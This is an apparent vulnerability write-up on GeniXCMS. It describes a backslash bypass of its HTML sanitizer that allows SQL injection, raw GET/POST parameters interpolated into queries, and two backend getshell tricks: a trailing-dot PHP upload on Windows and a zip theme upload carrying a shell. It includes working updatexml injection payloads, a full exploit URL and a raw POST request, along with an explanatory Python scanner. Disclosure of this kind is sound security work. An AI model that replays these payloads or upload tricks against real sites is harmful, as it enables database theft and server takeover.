After seeing Songkuo (松阔) get a CVE, I wanted to try auditing too; these are all extremely simple bugs.
I found an unsafe method that causes a lot of problems.
I hope this helps you.
method issue
Look at Db.class.php. The escape method itself is fine (mysql_escape_string prefixes quotes and backslashes with a backslash, although it is the deprecated, charset-unaware variant and the whole mysql_* extension is gone in PHP 7). It is used in insert/update etc., but it is not used in select.
    public static function escape($vars)
    {
        if (DB_DRIVER == 'mysql') {
            $vars = mysql_escape_string($vars);
        }
        // (rest of the method not shown in the original)
        return $vars;
    }
Instead, this program generally uses Typo::cleanX to sanitize $_POST / $_GET:
    public static function cleanX($c)
    {
        $val = self::strip_tags_content($c, '<script>', true);
        $val = htmlspecialchars(
            $val,
            ENT_QUOTES | ENT_HTML5,
            'utf-8'
        );
        return $val;
    }
It HTML-encodes the special characters (with ENT_QUOTES a single quote becomes &#039;, so a quote cannot be used directly), but the backslash \ is left untouched. A value ending in \ therefore escapes the closing quote of the SQL string literal, and that is enough to inject.
issue1
    public static function exist($tag)
    {
        $tag = Typo::cleanX($tag);
        $sql = "SELECT `name` FROM `cat` WHERE `name` = '{$tag}' OR `slug` = '{$tag}' AND `type` = 'tag'";
        $q = Db::result($sql);
        // echo Db::$num_rows;
        if (Db::$num_rows > 0) {
            return true;
        } else {
            return false;
        }
    }
If $tag is
    and updatexml(1,(select version()),1)#\
the built query is
    SELECT `name` FROM `cat` WHERE `name` = 'and updatexml(1,(select version()),1)#\' OR `slug` = 'and updatexml(1,(select version()),1)#\' AND `type` = 'tag'
The \ turns the first closing quote into an escaped quote, so MySQL reads the first string literal as running all the way to the quote that was meant to open the second {$tag}. Everything after that quote is parsed as SQL, and the # comments out the remainder (including the dangling quote and `AND `type` = 'tag'`), so what MySQL effectively executes is:
    SELECT `name` FROM `cat` WHERE `name` = 'xx' and updatexml(1,(select version()),1);
updatexml() then raises an XPath error whose message contains the result of the subquery.
issue2
    public static function insert($vars)
    {
        if (is_array($vars)) {
            $set = '';
            $k = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "'{$val}',";
                $k .= "`{$key}`,";
            }
            $set = substr($set, 0, -1);
            $k = substr($k, 0, -1);
            $sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s) ', $vars['table'], $k, $set);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
            self::$last_id = mysql_insert_id();
        }
        // (rest of the method not shown in the original)
    }
The problem is the else branch:
    if (is_array($vars)) {
        ...
    } else {
        $sql = $vars;
    }
When $vars is not an array, the string is used as the SQL verbatim, so $val = self::escape($val); never runs and escaping is left entirely to the caller. This causes security problems wherever a caller builds the string from input that only went through Typo::cleanX.
Example:
/inc/lib/Control/Backend/categories.control.php
    if (User::access(1)) {
        $data['sitetitle'] = CATEGORIES;
        switch (isset($_POST['addcat'])) {
            case true:
                // cleanup first
                $slug = Typo::slugify(Typo::cleanX($_POST['cat']));
                $cat = Typo::cleanX($_POST['cat']);
                if (!isset($_POST['token']) || !Token::isExist($_POST['token'])) {
                    // VALIDATE ALL
                    $alertDanger[] = TOKEN_NOT_EXIST;
                }
                if (!isset($_POST['cat']) || $_POST['cat'] == '') {
                    $alertDanger[] = CATEGORY_CANNOT_EMPTY;
                }
                if (isset($alertDanger)) {
                    $data['alertDanger'] = $alertDanger;
                } else {
                    $cat = Db::insert(
                        sprintf(
                            "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                            $cat,
                            $slug,
                            Typo::int($_POST['parent'])
                        )
                    );
                    //print_r($cat);
                    $data['alertSuccess'][] = MSG_CATEGORY_ADDED.' '.$_POST['cat'];
                }
                if (isset($_POST['token'])) {
                    Token::remove($_POST['token']);
                }
                break;
            default:
                break;
        }
    }
The unsafe call is here:
    $cat = Db::insert(
        sprintf(
            "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
            $cat,
            $slug,
            Typo::int($_POST['parent'])
        )
    );
Db::insert receives a string, so Db::escape is never applied; sprintf's %s does no escaping either, and $cat only went through Typo::cleanX, which leaves the backslash alone. A category name ending in \ shifts the string-literal boundaries of the INSERT exactly as in the exist() case above. Of course, update has the same problem.
[sql injection]
issue1:
/inc/lib/Control/Backend/posts.control.php
    $data['post'] = Db::result("SELECT * FROM `posts` WHERE `id` = '{$_GET['id']}' ");
$_GET['id'] is interpolated with no cleaning at all, so a plain quote is enough (the token is an admin CSRF token, so this needs a logged-in backend user).
exp1:
http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=posts&act=edit&id=6' and updatexml(1,(select user()),1)%23&token=Pp52R3oD4wuLBVutgD9hMsMrp8alQD3bKmuf06AI0HZMzoMiRe3s18BUa4eIOqrMqj38Cp9aoQqWaw10
issue2:
/inc/mod/newsletter/options.php
    $usr = Db::result("SELECT * FROM `user` WHERE `group` = '{$_POST['recipient']}'");
Same pattern: $_POST['recipient'] goes straight into the query.
exp2:
POST /code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1
Host: lemon.love
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter
Cookie: GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; USER_NAME_COOKIE=admin; SID_1=95aefa9c; GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; GeniXCMS-Installation=bscpujchn91pl57oj10af4vb45; GeniXCMS-vMIHkJPDSgZrrg3uywYO=48a5t0i0d7bqh4q3toepkckf37
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

subject=aaa%40qq.com&recipient=a'+and+updatexml(1,(select+version()),1)%23&type=text&token=x972PTSsrW9U5tCdFGTuRpgsNewA0Ozm3UTaPsh9ixhA3R0O25cRE7FCK3xlyEttm4EUGJXfgb3cCs3H&sendmail=&message=aaa
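To make the three injection shapes on this page concrete (the backslash bypass in exist(), the string-form Db::insert() in categories.control.php, and the raw $_GET['id'] in posts.control.php), here is an added illustration that is not GeniXCMS code: it rebuilds the SQL strings quoted above, runs them through a small model of MySQL's string-literal lexer, and reports which bytes MySQL would treat as SQL rather than as data. clean_x() approximates Typo::cleanX (htmlspecialchars with ENT_QUOTES) and mysql_escape() approximates mysql_escape_string(), i.e. Db::escape; the "x\" category name and the "x" slug are constructed sample values, since the page does not show slugify()'s output.

```python
"""Added illustration (not GeniXCMS code): why Typo::cleanX() does not stop the
injections on this page, modelled with a MySQL-style string-literal scanner.

clean_x()      approximates Typo::cleanX (htmlspecialchars, ENT_QUOTES | ENT_HTML5)
mysql_escape() approximates PHP's mysql_escape_string(), i.e. Db::escape()
The query builders reproduce the SQL strings quoted on the page; the "x\\"
category name and the "x" slug below are constructed sample values.
"""
import html


def clean_x(value: str) -> str:
    # htmlspecialchars() encodes & < > " and ' (Python emits &#x27; where PHP
    # emits &#039;, which makes no difference here).  The backslash is left alone.
    return html.escape(value, quote=True)


def mysql_escape(value: str) -> str:
    # mysql_escape_string(): prefix NUL, \n, \r, \, ', " and ^Z with a backslash.
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def exist_query(tag: str) -> str:
    # The query that exist() builds (tag already passed through the sanitizer).
    return (f"SELECT `name` FROM `cat` WHERE `name` = '{tag}' "
            f"OR `slug` = '{tag}' AND `type` = 'tag'")


def categories_insert_query(cat: str, slug: str, parent: int) -> str:
    # The sprintf() string that categories.control.php hands to Db::insert().
    return f"INSERT INTO `cat` VALUES (null, '{cat}', '{slug}', '{parent}', '', 'post' )"


def posts_query(post_id: str) -> str:
    # posts.control.php: $_GET['id'] goes in with no cleaning at all.
    return f"SELECT * FROM `posts` WHERE `id` = '{post_id}' "


def code_outside_literals(sql: str) -> str:
    """Re-lex `sql` the way MySQL does in its default sql_mode: inside a quoted
    literal a backslash escapes the next character and '' (or "") is a literal
    quote; outside a literal, '#' starts a comment that runs to end of line.
    Every literal is replaced by '?' and comments are dropped, leaving only the
    bytes MySQL treats as SQL."""
    out, i, n = [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch in "'\"":
            quote = ch
            i += 1
            while i < n:
                if sql[i] == "\\":           # \x : x is data, not a delimiter
                    i += 2
                    continue
                if sql[i] == quote:
                    if i + 1 < n and sql[i + 1] == quote:   # doubled quote
                        i += 2
                        continue
                    i += 1
                    break                    # literal closed
                i += 1
            out.append("?")                  # an unterminated literal still counts as one
            continue
        if ch == "#":                        # comment runs to end of line
            while i < n and sql[i] != "\n":
                i += 1
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def injected(sql: str) -> bool:
    # True when the payload's function call lands outside every string literal.
    return "updatexml" in code_outside_literals(sql).lower()


# The page's payload for exist(): no quote at all, only a trailing backslash.
TAG_PAYLOAD = "and updatexml(1,(select version()),1)#\\"
# The page's payload for posts.control.php: a bare quote works, nothing escapes it.
ID_PAYLOAD = "6' and updatexml(1,(select user()),1)#"

if __name__ == "__main__":
    cases = [("exist/cleanX", exist_query(clean_x(TAG_PAYLOAD))),
             ("exist/escape", exist_query(mysql_escape(TAG_PAYLOAD))),
             ("posts/raw", posts_query(ID_PAYLOAD)),
             ("posts/escape", posts_query(mysql_escape(ID_PAYLOAD))),
             ("insert/cleanX", categories_insert_query(clean_x("x\\"), "x", 0)),
             ("insert/escape", categories_insert_query(mysql_escape("x\\"), "x", 0))]
    for label, sql in cases:
        print(f"{label:14} injected={injected(sql)}  SQL seen: {code_outside_literals(sql)}")
```

Running it shows the exist() query collapsing to `WHERE `name` = ?and updatexml(...)` under cleanX but staying `= ? OR `slug` = ? AND `type` = ?` under Db::escape, and the INSERT losing its five-literal shape as soon as the category name ends in a backslash. Treat the scanner as a reading aid, not a validator: the real fix for every case here is a prepared statement, not a better escaper.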
Backend getshell
1. Windows
In the media manager, upload a file named 1.php. (with a trailing dot). The extension check sees "php.", but Windows strips trailing dots when it creates the file, so it lands on disk as 1.php and you have a shell.
2. Generic
Theme install: upload a zip file containing
\inc\themes\shell\1\1.php